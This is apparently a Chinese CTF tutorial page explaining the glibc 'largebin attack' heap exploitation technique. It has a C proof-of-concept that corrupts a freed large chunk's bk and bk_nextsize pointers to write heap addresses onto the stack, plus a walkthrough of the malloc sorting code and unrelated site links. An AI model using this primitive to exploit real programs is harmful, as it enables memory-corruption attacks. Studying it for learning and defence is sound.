PWN:Largebin Attack
时间:2022-07-24
本文章向大家介绍PWN:Largebin Attack,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
Largebin Attack
还是先了解一下 largebin 是啥
大小:大于 1024 字节
双向循环链表,先进先出,按照从大到小排序
当有空闲块相邻的时候,chunk 会被合并
除了 fd、bk 指针还有 fd_nextsize 和 bk_nextsize
#include<stdio.h>
#include<stdlib.h>
int main() {
unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;
fprintf(stderr, "The targets we want to rewrite on stack:n");
fprintf(stderr, "stack_var1 (%p): %ldn", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ldnn", &stack_var2, stack_var2);
unsigned long *p1 = malloc(0x100);
fprintf(stderr, "Now, we allocate the first chunk: %pn", p1 - 2);
malloc(0x10);
unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second chunk(large chunk): %pn", p2 - 2);
malloc(0x10);
unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %pnn", p3 - 2);
malloc(0x10);
free(p1);
free(p2);
fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted binn");
malloc(0x30);
fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelistnn");
p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);
fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunknn");
free(p3);
malloc(0x30);
fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:n");
fprintf(stderr, "stack_var1 (%p): %pn", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %pn", &stack_var2, (void *)stack_var2);
}
gcc -g 1.c
首先申请了几个 chunk
接下来释放掉前两个
接下来去申请一个 0x30 大小的,他会把前面那个 0x100 大小的切割
同时因为我们去申请了,他就会给 unsortedbin 中的 free chunk 进行整理划分,把那两块大的放到 largebin
接下来去修改 p2,之前:
之后:
我们伪造的分别是 p2 的 size、bk 以及 bk_nextsize,接下来对 p3 进行 free,然后再申请一个 chunk,这样的话 p3 就会被整理到 largebin
而 largebin 是按照从大到小排序的,所以需要进行排序,排序的操作大概是:
//victim是p3、fwd是修改后的p2
{
victim->fd_nextsize = fwd;//1
victim->bk_nextsize = fwd->bk_nextsize;//2
fwd->bk_nextsize = victim;//3
victim->bk_nextsize->fd_nextsize = victim;//4
}
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
把 2 带入 4 得到:fwd->bk_nextsize->fd_nextsize=victim
同时下面有:fwd->bk=victim
也就是说之前我们伪造的 p2 的 bk 跟 bk_nextsize 指向的地址被改为了 victim
即 (unsigned long)(&stack_var1 - 2) 与 (unsigned long)(&stack_var2 - 4) 被改为了 victim
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 为什么大家都说“SELECT *”效率低?
- 手把手教你如何搭建一套GPS定位系统平台
- [较难]LeetCode-4.寻找两个正序数组的中位数 利用数组扩充和二分法切割思想实现
- Go Errors 错误处理
- MySQL数据库备份实操
- spring-cloud-config:配置同步原理
- Newbe.Claptrap 框架入门,第二步 —— 简单业务,清空购物车
- 来自前端同学对后端童鞋的吐槽!@!#^$%
- Linux ADF(Atomic Display Framework)浅析---概述
- Swift进阶二:基本数据类型相关
- 控制反转与依赖注入
- 每日两题 T16
- 每日两题 T13
- 每日两题 T21
- 每日两题 T4